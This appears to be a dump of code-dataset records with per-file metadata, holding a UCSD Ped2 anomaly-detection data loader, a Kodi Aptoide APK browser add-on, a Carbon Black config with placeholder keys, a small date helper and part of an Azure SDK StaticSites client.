# By HaoZhang, for UCSD/ped1 or ped2, video_id: TestXXX(XXX:001~012)
img_list = sorted(glob(join(sequence_dir, '*.tif'))) # all tif frames under the current video id
test_clip = []
for img_path in img_list: # process every tif image
img = io.imread(img_path)
img = resize(img, output_shape=(h, w), preserve_range=True) # preserve_range: whether to keep the original value range
img = np.uint8(img)
test_clip.append(img) # list of frames
test_clip = np.stack(test_clip) # stack all frames into one higher-dimensional tensor
# An earlier approach merged only 16 frames per clip over [start, end]; here the whole video is loaded at once.
return test_clip # 4-D tensor of all frames: (n_frames, h, w, c); clips are extracted from it as needed
# Caveat: reading every image of the current subdirectory into memory at once may exhaust RAM,
# and video_id must be passed each time to fetch that video's frames.
def load_test_sequence_gt(self, video_id):
# type: (str) -> np.ndarray
"""
Loads the groundtruth of a test video in memory.
:param video_id: the id of the test video for which the groundtruth has to be loaded.
:return: the groundtruth of the video in a np.ndarray, with shape (n_frames,).
"""
sequence_dir = join(self.test_dir, f'{video_id}_gt')
# By HaoZhang, for UCSD/ped1 or ped2, video_id: TestXXX(XXX:001~012)
img_list = sorted(glob(join(sequence_dir, '*.bmp')))
clip_gt = []
for img_path in img_list:
img = io.imread(img_path) // 255 # floor division maps 0/255 pixels to 0/1 (note: 5 // 2 == 2, not 2.5)
clip_gt.append(np.max(img)) # if at least one pixel is 1, then anomaly
clip_gt = np.stack(clip_gt)
return clip_gt
def test(self, video_id):
# type: (str) -> None
"""
Sets the dataset in test mode.
:param video_id: the id of the video to test.
"""
c, t, h, w = self.raw_shape
self.cur_video_id = video_id
self.cur_video_frames = self.load_test_sequence_frames(video_id)
self.cur_video_gt = self.load_test_sequence_gt(video_id)
self.cur_len = len(self.cur_video_frames) - t + 1 # number of length-t clips obtainable from this video
# Note: len(tensor) == tensor.size()[0] or tensor.shape[0]
# The core of this cur_len computation is a sliding window: e.g. [1,2,3,4,5] with window_size 3 yields the clips
# [1,2,3], [2,3,4], [3,4,5], i.e. total_len - window_size + 1 (here 5 - 3 + 1 == 3)
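# Illustrative sketch (added, not part of the original file): a quick check of the sliding-window
# count above, using the hypothetical values n_frames=120 and t=16.
# n_frames, t = 120, 16
# assert n_frames - t + 1 == 105  # one clip per window start index, 0 .. n_frames - t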
@property
def shape(self):
# type: () -> Tuple[int, int, int, int]
"""
Returns the shape of examples being fed to the model.
"""
return self.crop_shape
@property
def raw_shape(self):
# type: () -> Tuple[int, int, int, int]
"""
Returns the shape of the raw examples (prior to patches).
"""
return 1, 16, 256, 384 # TODO: the original UCSD image size is 238x158x1, so what does raw_shape correspond to here?
@property
def crop_shape(self):
# type: () -> Tuple[int, int, int, int]
"""
Returns the shape of examples (patches).
"""
return 1, 8, 32, 32 # TODO: what exactly is the physical process of this crop?
@property
def test_videos(self):
# type: () -> List[str]
"""
Returns all available test videos.
"""
return self.test_ids
def __len__(self):
# type: () -> int
"""
Returns the number of examples.
"""
return int(self.cur_len)
def __getitem__(self, i):
# type: (int) -> Tuple[torch.Tensor, torch.Tensor]
"""
Provides the i-th example.
"""
c, t, h, w = self.raw_shape
clip = self.cur_video_frames[i:i+t] # slicing defaults to the first (temporal) dimension
clip = np.expand_dims(clip, axis=-1) # add channel dimension (TODO: why is the extra dimension needed?)
sample = clip, clip # reconstruction model: x -> x
if self.transform:
sample = self.transform(sample)
return sample
@property
def collate_fn(self):
"""
Returns a function that decides how to merge a list of examples in a batch.
"""
return concat_collate
def __repr__(self):
return f'UCSD Ped2 (video id = {self.cur_video_id})'
# Small test snippet
def test_test_load_test_ids():
dataset = UCSDPed2(path='/home/zh/Papers_Code/CVPR2019_pytorch_VAD'
'/novelty-detection/data/UCSD_Anomaly_Dataset.v1p2')
print("self.test_ids: ", dataset.test_ids)
res = dataset.load_test_ids()
print("test_load_test_ids,res: ", res)
#####################################################################################
# For Training by HaoZhang
class UCSDPed2_TRAIN(VideoAnomalyDetectionDataset):
"""
Models UCSD Ped2 dataset for video anomaly detection.
"""
def __init__(self, path):
# type: (str) -> None
"""
Class constructor.
:param path: The folder in which UCSD is stored.
"""
super(UCSDPed2_TRAIN, self).__init__()
self.path = join(path, 'UCSDped2') # this path is shared by Train and Test
# Train directory
self.train_dir = join(self.path, 'Train')
# Transform
# TODO: does training need any additional data augmentation? Ask the paper's authors.
self.transform = transforms.Compose([ToFloatTensor3D(), ToCrops(self.raw_shape, self.crop_shape)])
# Load all train ids
self.train_ids = self.load_train_ids()
# Other utilities
self.cur_len = 0
self.cur_video_id = None # one of the TrainXXX (XXX: 001~016) directories under Train
self.cur_video_frames = None
# self.cur_video_gt = None
def load_train_ids(self):
# type: () -> List[str]
"""
Loads the set of all train video ids.
############################################################################################################
# By HaoZhang
# basename strips the directory path and returns only the file name: e.g. os.path.basename('d:\\library\\book.txt') => 'book.txt'
# glob(join(self.train_dir, '**')): returns the path names under {self.train_dir/'**'};
# '*' matches the preceding expression zero or more times, equivalent to {0,}.
# Combined with the if below, this function returns all directory names under self.train_dir,
# i.e. the TrainXXX (XXX: 001~016) directories under UCSD_Anomaly_Dataset.v1p2/UCSDped2/Train.
############################################################################################################
:return: The list of train ids.
"""
return sorted([basename(d) for d in glob(join(self.train_dir, '**')) if isdir(d)])
def load_train_sequence_frames(self, video_id):
# type: (str) -> np.ndarray
"""
Loads a train video in memory.
:param video_id: the id of the train video to be loaded
:return: the video in a np.ndarray, with shape (n_frames, h, w, c).
"""
c, t, h, w = self.raw_shape
sequence_dir = join(self.train_dir, video_id)
# By HaoZhang, for UCSD/ped1 or ped2, video_id: TrainXXX(XXX:001~016)
img_list = sorted(glob(join(sequence_dir, '*.tif'))) # all tif frames under the current video id
train_clip = []
for img_path in img_list: # process every tif image
img = io.imread(img_path)
img = resize(img, output_shape=(h, w), preserve_range=True) # preserve_range: whether to keep the original value range
img = np.uint8(img)
train_clip.append(img) # list of frames
train_clip = np.stack(train_clip) # stack all frames into one higher-dimensional tensor
# An earlier approach merged only 16 frames per clip over [start, end]; here the whole video is loaded at once.
return train_clip # 4-D tensor of all frames: (n_frames, h, w, c); clips are extracted from it as needed
# Caveat: reading every image of the current subdirectory into memory at once may exhaust RAM,
# and video_id must be passed each time to fetch that video's frames.
# def load_test_sequence_gt(self, video_id):
# # type: (str) -> np.ndarray
# """
# Loads the groundtruth of a test video in memory.
#
# :param video_id: the id of the test video for which the groundtruth has to be loaded.
# :return: the groundtruth of the video in a np.ndarray, with shape (n_frames,).
# """
# sequence_dir = join(self.test_dir, f'{video_id}_gt')
# # By HaoZhang, for UCSD/pde1 or ped2, video_id: TestXXX(XXX:001~012)
# img_list = sorted(glob(join(sequence_dir, '*.bmp')))
# clip_gt = []
# for img_path in img_list:
# img = io.imread(img_path) // 255 # 5 // 2 == 2.5
# clip_gt.append(np.max(img)) # if at least one pixel is 1, then anomaly
# clip_gt = np.stack(clip_gt)
# return clip_gt
def train(self, video_id):
# type: (str) -> None
"""
Sets the dataset in train mode.
:param video_id: the id of the video to train on.
"""
c, t, h, w = self.raw_shape # default clip_len is 16
self.cur_video_id = video_id
self.cur_video_frames = self.load_train_sequence_frames(video_id)
# self.cur_video_gt = self.load_test_sequence_gt(video_id)
self.cur_len = len(self.cur_video_frames) - t + 1 # number of length-t clips obtainable from this video
# Note: len(tensor) == tensor.size()[0] or tensor.shape[0]
# Verified by running the code: the above holds.
# The core of this cur_len computation is a sliding window: e.g. [1,2,3,4,5] with window_size 3 yields the clips
# [1,2,3], [2,3,4], [3,4,5], i.e. total_len - window_size + 1 (here 5 - 3 + 1 == 3)
@property
def shape(self):
# type: () -> Tuple[int, int, int, int]
"""
Returns the shape of examples being fed to the model.
"""
return self.crop_shape
@property
def raw_shape(self):
# type: () -> Tuple[int, int, int, int]
"""
Returns the shape of the raw examples (prior to patches).
"""
return 1, 16, 256, 384 # TODO: the original UCSD image size is 238x158x1, so what does raw_shape correspond to here?
@property
def crop_shape(self):
# type: () -> Tuple[int, int, int, int]
"""
Returns the shape of examples (patches).
"""
return 1, 8, 32, 32 # TODO: what exactly is the physical process of this crop? What does the 8 mean?
@property
def train_videos(self):
# type: () -> List[str]
"""
Returns all available train videos.
"""
return self.train_ids
def __len__(self):
# type: () -> int
"""
Returns the number of examples.
"""
return int(self.cur_len)
def __getitem__(self, i):
# type: (int) -> Tuple[torch.Tensor, torch.Tensor]
"""
Provides the i-th example.
"""
c, t, h, w = self.raw_shape
clip = self.cur_video_frames[i:i + t] # slicing defaults to the first (temporal) dimension
clip = np.expand_dims(clip, axis=-1) # add channel dimension (TODO: why is the extra dimension needed?)
sample = clip, clip # reconstruction model: x -> x
if self.transform:
sample = self.transform(sample)
return sample
@property
def collate_fn(self):
"""
Returns a function that decides how to merge a list of examples in a batch.
"""
return concat_collate
def __repr__(self):
return f'UCSD Ped2 (video id = {self.cur_video_id})'
# by HaoZhang
# At first the test would not run and it looked like a code-structure problem;
# it was actually a package/environment dependency issue, fixed by resolving the packages one by one.
def test_TRAIN():
dataset = UCSDPed2_TRAIN(path='/home/zh/Papers_Code/CVPR2019_pytorch_VAD'
'/novelty-detection/data/UCSD_Anomaly_Dataset.v1p2')
print("self.train_dir: ", dataset.train_dir)
ids = dataset.load_train_ids()
print("ids: ", ids) # Trainxxx (001~016)
#
clip = dataset.load_train_sequence_frames("Train001")
print("clip.shape: ", clip.shape) # (120, 256, 384)
#
dataset.train("Train001")
print("Train001的cur_len", dataset.cur_len) # 理想是120-16+1 = 105
# 实际是:105,逻辑正确
#
clip_0 = dataset[0]
print("clip_0的shape: ", clip_0[0].shape, clip_0[1].shape)
# 没有加入self.transform,是这样的:(16, 256, 384, 1) (16, 256, 384, 1)
# 加入 self.transform,这样的:torch.Size([690, 1, 8, 32, 32]) torch.Size([690, 1, 8, 32, 32])
# TODO 本论文的transform看来有必要认真读下!!!
#
####################################################################################
if __name__ == '__main__':
##########################################################
# for Testing set
# test_test_load_test_ids()
##########################################################
# for Training
test_TRAIN()
| 35.480861
| 116
| 0.569483
| 1,880
| 14,831
| 4.327128
| 0.156383
| 0.030977
| 0.026552
| 0.017701
| 0.802459
| 0.796435
| 0.795943
| 0.776644
| 0.776644
| 0.776644
| 0
| 0.026598
| 0.269908
| 14,831
| 417
| 117
| 35.565947
| 0.724695
| 0.450273
| 0
| 0.522013
| 0
| 0
| 0.064521
| 0.029171
| 0
| 0
| 0
| 0.019185
| 0
| 1
| 0.169811
| false
| 0
| 0.09434
| 0.012579
| 0.408805
| 0.044025
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22b91bb83edf52fba90fa608adc6893df56d5d90
| 979
|
py
|
Python
|
user/vistas/widgets/subFooter.py
|
ZerpaTechnology/occoa
|
a8c0bd2657bc058801a883109c0ec0d608d04ccc
|
[
"Apache-2.0"
] | null | null | null |
user/vistas/widgets/subFooter.py
|
ZerpaTechnology/occoa
|
a8c0bd2657bc058801a883109c0ec0d608d04ccc
|
[
"Apache-2.0"
] | null | null | null |
user/vistas/widgets/subFooter.py
|
ZerpaTechnology/occoa
|
a8c0bd2657bc058801a883109c0ec0d608d04ccc
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
doc+='''<section class="well3"> <div class="container"> <ul class="row contact-list"> <li class="grid_4"> '''
try: doc+=str(incluir(data,"box-info"))
except Exception, e: doc+=str(e)
doc+=''' '''
try: doc+=str(incluir(data,"box-info"))
except Exception, e: doc+=str(e)
doc+=''' </li> <li class="grid_4"> '''
try: doc+=str(incluir(data,"box-info"))
except Exception, e: doc+=str(e)
doc+=''' '''
try: doc+=str(incluir(data,"box-info"))
except Exception, e: doc+=str(e)
doc+=''' </li> <li class="grid_4"> '''
try: doc+=str(incluir(data,"box-info"))
except Exception, e: doc+=str(e)
doc+=''' '''
try: doc+=str(incluir(data,"box-info"))
except Exception, e: doc+=str(e)
doc+=''' </li> </ul> </div> </section>'''
| 46.619048
| 157
| 0.46476
| 120
| 979
| 3.766667
| 0.233333
| 0.159292
| 0.119469
| 0.212389
| 0.79646
| 0.79646
| 0.79646
| 0.79646
| 0.79646
| 0.79646
| 0
| 0.007396
| 0.309499
| 979
| 21
| 158
| 46.619048
| 0.661243
| 0.038815
| 0
| 0.894737
| 0
| 0.052632
| 0.493617
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fe0a8b1602b4b75375a88a00701deb6fec635fb5
| 6,145
|
py
|
Python
|
plugin.program.aptoide/resources/lib/api/aptoide.py
|
akuala/REPO.KUALA
|
ea9a157025530d2ce8fa0d88431c46c5352e89d4
|
[
"Apache-2.0"
] | 2
|
2018-11-02T19:55:30.000Z
|
2020-08-14T02:22:20.000Z
|
plugin.program.aptoide/resources/lib/api/aptoide.py
|
akuala/REPO.KUALA
|
ea9a157025530d2ce8fa0d88431c46c5352e89d4
|
[
"Apache-2.0"
] | null | null | null |
plugin.program.aptoide/resources/lib/api/aptoide.py
|
akuala/REPO.KUALA
|
ea9a157025530d2ce8fa0d88431c46c5352e89d4
|
[
"Apache-2.0"
] | 3
|
2019-12-17T20:47:00.000Z
|
2021-02-11T19:03:59.000Z
|
from resources.lib.modules import control, cleantitle
import requests
import os,sys,re,json,urllib,urlparse,json
import xbmc, xbmcaddon, xbmcgui, xbmcvfs
params = dict(urlparse.parse_qsl(sys.argv[2].replace('?','')))
action = params.get('action')
sysaddon = sys.argv[0]
syshandle = int(sys.argv[1])
addonInfo = xbmcaddon.Addon().getAddonInfo
profilePath = xbmc.translatePath(addonInfo('profile')).decode('utf-8')
aptoide_API = 'https://ws75.aptoide.com/api/7'
appMeta = '/app/getMeta/app_id='
popular_apps = '/apps/get/sort=downloads/limit=100/offset='
group_apps = '/apps/get/limit=100/sort=downloads/group_name='
icon = control.icon
fanart = control.fanart
def getPopulars(offset=None):
if offset == None: offset = '0'
link = popular_apps + offset
url = aptoide_API + link
r = requests.get(url).json()
r = r['datalist']['list']
for item in r:
name = item['name'].encode('utf-8')
name = cleantitle.normalize(name)
id = item['id']
downloads = item['stats']['downloads']
icon = item['icon']
fanart = item['graphic']
version = item['file']['vername'].encode('utf-8')
label = name + " [" + version + "]"
item = control.item(label=label)
isFolder = False
item.setArt({'icon': icon, 'thumb': icon})
if fanart == '' or fanart == None: fanart = control.fanart
item.setProperty('Fanart_Image', fanart)
description = 'DOWNLOADS: ' + str(downloads)
meta = {'plot': description}
meta.update({'Title': label})
sysname = cleantitle.geturl(name)
item.setInfo( type="Video", infoLabels= meta )
url = '%s?action=%s&id=%s&title=%s' % (sysaddon, 'AppSelect', id, sysname)
control.addItem(handle=syshandle, url=url, listitem=item, isFolder=isFolder)
control.directory(syshandle, cacheToDisc=False)
def AppSelect(title, id):
type = ['Download App', 'Install App']
select = control.selectDialog(type)
if select == 0: downloadApp(title, id)
elif select == 1: installApp(title, id)
else: return
def downloadApp(title, id):
link = appMeta + id
url = aptoide_API + link
r = requests.get(url).json()
path = r['data']['file']['path']
title = title + ".apk"
from resources.lib.modules import downloader
loc = control.setting('download.path')
downloader.downloadAPK(title, path)
def installApp(title, id):
link = appMeta + id
url = aptoide_API + link
r = requests.get(url).json()
path = r['data']['file']['path']
title = title + ".apk"
from resources.lib.modules import downloader
loc = control.setting('download.path')
downloader.installAPK(title, path)
def searchApp():
k = control.keyboard('', 'Search APP') ; k.doModal()
q = k.getText() if k.isConfirmed() else None
if (q == None or q == ''): return
query = '/apps/search/query=%s/limit=50' % q
url = aptoide_API + query
getAppsUrl(url)
def getAppsUrl(url):
r = requests.get(url).json()
r = r['datalist']['list']
for item in r:
name = item['name'].encode('utf-8')
name = cleantitle.normalize(name)
id = item['id']
downloads = item['stats']['downloads']
icon = item['icon']
fanart = item['graphic']
version = item['file']['vername'].encode('utf-8')
label = name + " [" + version + "]"
item = control.item(label=label)
isFolder = False
item.setArt({'icon': icon, 'thumb': icon})
if fanart == '' or fanart == None: fanart = control.fanart
item.setProperty('Fanart_Image', fanart)
description = 'DOWNLOADS: ' + str(downloads)
meta = {'plot': description}
meta.update({'Title': label})
sysname = cleantitle.geturl(name)
item.setInfo( type="Video", infoLabels= meta )
url = '%s?action=%s&id=%s&title=%s' % (sysaddon, 'AppSelect', id, sysname)
control.addItem(handle=syshandle, url=url, listitem=item, isFolder=isFolder)
control.directory(syshandle, cacheToDisc=False)
def getStore(name):
link = group_apps + name
url = aptoide_API + link
r = requests.get(url).json()
r = r['datalist']['list']
for item in r:
name = item['name'].encode('utf-8')
name = cleantitle.normalize(name)
id = item['id']
downloads = item['stats']['downloads']
icon = item['icon']
fanart = item['graphic']
if fanart == '' or fanart == None: fanart = control.fanart
version = item['file']['vername'].encode('utf-8')
label = name + " [" + version + "]"
item = control.item(label=label)
isFolder = False
item.setArt({'icon': icon, 'thumb': icon})
item.setProperty('Fanart_Image', fanart)
description = 'DOWNLOADS: ' + str(downloads)
meta = {'plot': description}
meta.update({'Title': label})
item.setInfo( type="Video", infoLabels= meta )
sysname = cleantitle.geturl(name)
url = '%s?action=%s&id=%s&title=%s' % (sysaddon, 'AppSelect', id, sysname)
control.addItem(handle=syshandle, url=url, listitem=item, isFolder=isFolder)
control.directory(syshandle, cacheToDisc=False)
def getGames(offset=None):
if offset == None: offset = '0'
link = '/store/groups/get/store_name=apps/group_name=games'
url = aptoide_API + link
r = requests.get(url).json()
r = r['datalist']['list']
for item in r:
name = item['name'].encode('utf-8')
id = item['id']
id = str(id)
label = name
item = control.item(label=label)
isFolder = True
item.setArt({'icon': icon, 'thumb': icon})
item.setProperty('Fanart_Image', fanart)
url = '%s?action=%s&id=%s' % (sysaddon, 'getStore', name)
control.addItem(handle=syshandle, url=url, listitem=item, isFolder=isFolder)
control.directory(syshandle, cacheToDisc=False)
def getApplications(offset=None):
if offset == None: offset = '0'
link = '/store/groups/get/store_name=apps/group_name=applications'
url = aptoide_API + link
r = requests.get(url).json()
r = r['datalist']['list']
for item in r:
name = item['name'].encode('utf-8')
id = item['id']
id = str(id)
label = name
item = control.item(label=label)
isFolder = True
item.setArt({'icon': icon, 'thumb': icon})
item.setProperty('Fanart_Image', fanart)
url = '%s?action=%s&id=%s' % (sysaddon, 'getStore', name)
control.addItem(handle=syshandle, url=url, listitem=item, isFolder=isFolder)
control.directory(syshandle, cacheToDisc=False)
| 32.172775
| 78
| 0.663792
| 811
| 6,145
| 5
| 0.177559
| 0.008878
| 0.019729
| 0.025894
| 0.762762
| 0.75561
| 0.747226
| 0.747226
| 0.72947
| 0.72947
| 0
| 0.005428
| 0.160618
| 6,145
| 190
| 79
| 32.342105
| 0.780729
| 0
| 0
| 0.742331
| 0
| 0
| 0.158691
| 0.049805
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.03681
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a4de57dace39dbf6c0b9050d623e6b87e9b5fe8
| 632
|
py
|
Python
|
threat_hunting/CB-Command_R/config.py
|
knightsc/tau-tools
|
7782383c162bc2642ecdcbc75e8a19cbdfd298e9
|
[
"MIT"
] | 202
|
2018-11-28T20:31:21.000Z
|
2022-03-11T08:09:03.000Z
|
threat_hunting/CB-Command_R/config.py
|
knightsc/tau-tools
|
7782383c162bc2642ecdcbc75e8a19cbdfd298e9
|
[
"MIT"
] | 7
|
2018-11-30T08:42:31.000Z
|
2020-10-14T23:40:31.000Z
|
threat_hunting/CB-Command_R/config.py
|
knightsc/tau-tools
|
7782383c162bc2642ecdcbc75e8a19cbdfd298e9
|
[
"MIT"
] | 76
|
2018-11-28T20:31:23.000Z
|
2021-12-15T06:03:21.000Z
|
#!/usr/bin/env python
active = {
'url': 'https://<SUBDOMAIN>.carbonblack.io/api/v1/process',
'key': '<API KEY>'
}
# ======================================================================
# Place API key and URL in 'active' to use with the cmdline-search.py
# ======================================================================
env1 = {
'url': 'https://<SUBDOMAIN>.carbonblack.io/api/v1/process',
'key': '<API KEY>'
}
env2 = {
'url': 'https://<SUBDOMAIN>.carbonblack.io/api/v1/process',
'key': '<API KEY>'
}
etc = {
'url': 'https://<SUBDOMAIN>.carbonblack.io/api/v1/process',
'key': '<API KEY>'
}
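# A hedged usage sketch (added for illustration; the import name and dictionary keys are assumed
# from this config layout, not verified against cmdline-search.py):
# from config import active
# url, key = active['url'], active['key']  # the search script would then query `url` authenticating with `key`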
| 25.28
| 72
| 0.455696
| 66
| 632
| 4.363636
| 0.409091
| 0.104167
| 0.236111
| 0.388889
| 0.708333
| 0.708333
| 0.708333
| 0.708333
| 0.708333
| 0.708333
| 0
| 0.011029
| 0.139241
| 632
| 25
| 73
| 25.28
| 0.518382
| 0.363924
| 0
| 0.5
| 0
| 0
| 0.641604
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4a4ff642c2571f6247fdf4cd7cc4a8a8f3e7e643
| 171
|
py
|
Python
|
backend/notes/getDateTime.py
|
MUCCHU/notefy
|
711febd361c7a00b05e4e5bf191a52101b6dbbd6
|
[
"MIT"
] | null | null | null |
backend/notes/getDateTime.py
|
MUCCHU/notefy
|
711febd361c7a00b05e4e5bf191a52101b6dbbd6
|
[
"MIT"
] | null | null | null |
backend/notes/getDateTime.py
|
MUCCHU/notefy
|
711febd361c7a00b05e4e5bf191a52101b6dbbd6
|
[
"MIT"
] | null | null | null |
def giveMeDateTime(date_time):
split_date = date_time.split("T")
return (split_date[0] + " " + split_date[1].split(":")[0] + ":" + split_date[1].split(":")[1])
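# Usage sketch (added for illustration, with a hypothetical timestamp):
# giveMeDateTime("2021-05-04T07:42:52.000Z") -> "2021-05-04 07:42"
# i.e. the date plus hours and minutes; seconds and everything after them are dropped.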
| 42.75
| 98
| 0.596491
| 24
| 171
| 4
| 0.375
| 0.375
| 0.270833
| 0.229167
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0.034722
| 0.157895
| 171
| 4
| 98
| 42.75
| 0.631944
| 0
| 0
| 0
| 0
| 0
| 0.029586
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
4a6fccf9f856ca23a3af4a41603bdf8a23e2b3f7
| 96,286
|
py
|
Python
|
sdk/appservice/azure-mgmt-web/azure/mgmt/web/v2020_09_01/aio/operations/_static_sites_operations.py
|
beltr0n/azure-sdk-for-python
|
2f7fb8bee881b0fc0386a0ad5385755ceedd0453
|
[
"MIT"
] | 2
|
2021-03-24T06:26:11.000Z
|
2021-04-18T15:55:59.000Z
|
sdk/appservice/azure-mgmt-web/azure/mgmt/web/v2020_09_01/aio/operations/_static_sites_operations.py
|
beltr0n/azure-sdk-for-python
|
2f7fb8bee881b0fc0386a0ad5385755ceedd0453
|
[
"MIT"
] | 4
|
2019-04-17T17:57:49.000Z
|
2020-04-24T21:11:22.000Z
|
sdk/appservice/azure-mgmt-web/azure/mgmt/web/v2020_09_01/aio/operations/_static_sites_operations.py
|
beltr0n/azure-sdk-for-python
|
2f7fb8bee881b0fc0386a0ad5385755ceedd0453
|
[
"MIT"
] | 2
|
2021-05-23T16:46:31.000Z
|
2021-05-26T23:51:09.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class StaticSitesOperations:
"""StaticSitesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.web.v2020_09_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def preview_workflow(
self,
location: str,
static_sites_workflow_preview_request: "_models.StaticSitesWorkflowPreviewRequest",
**kwargs
) -> "_models.StaticSitesWorkflowPreview":
"""Generates a preview workflow file for the static site.
Description for Generates a preview workflow file for the static site.
:param location: Location where you plan to create the static site.
:type location: str
:param static_sites_workflow_preview_request: A JSON representation of the
StaticSitesWorkflowPreviewRequest properties. See example.
:type static_sites_workflow_preview_request: ~azure.mgmt.web.v2020_09_01.models.StaticSitesWorkflowPreviewRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StaticSitesWorkflowPreview, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StaticSitesWorkflowPreview
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSitesWorkflowPreview"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.preview_workflow.metadata['url'] # type: ignore
path_format_arguments = {
'location': self._serialize.url("location", location, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(static_sites_workflow_preview_request, 'StaticSitesWorkflowPreviewRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('StaticSitesWorkflowPreview', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
preview_workflow.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Web/locations/{location}/previewStaticSiteWorkflowFile'} # type: ignore
def list(
self,
**kwargs
) -> AsyncIterable["_models.StaticSiteCollection"]:
"""Get all Static Sites for a subscription.
Description for Get all Static Sites for a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either StaticSiteCollection or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.StaticSiteCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
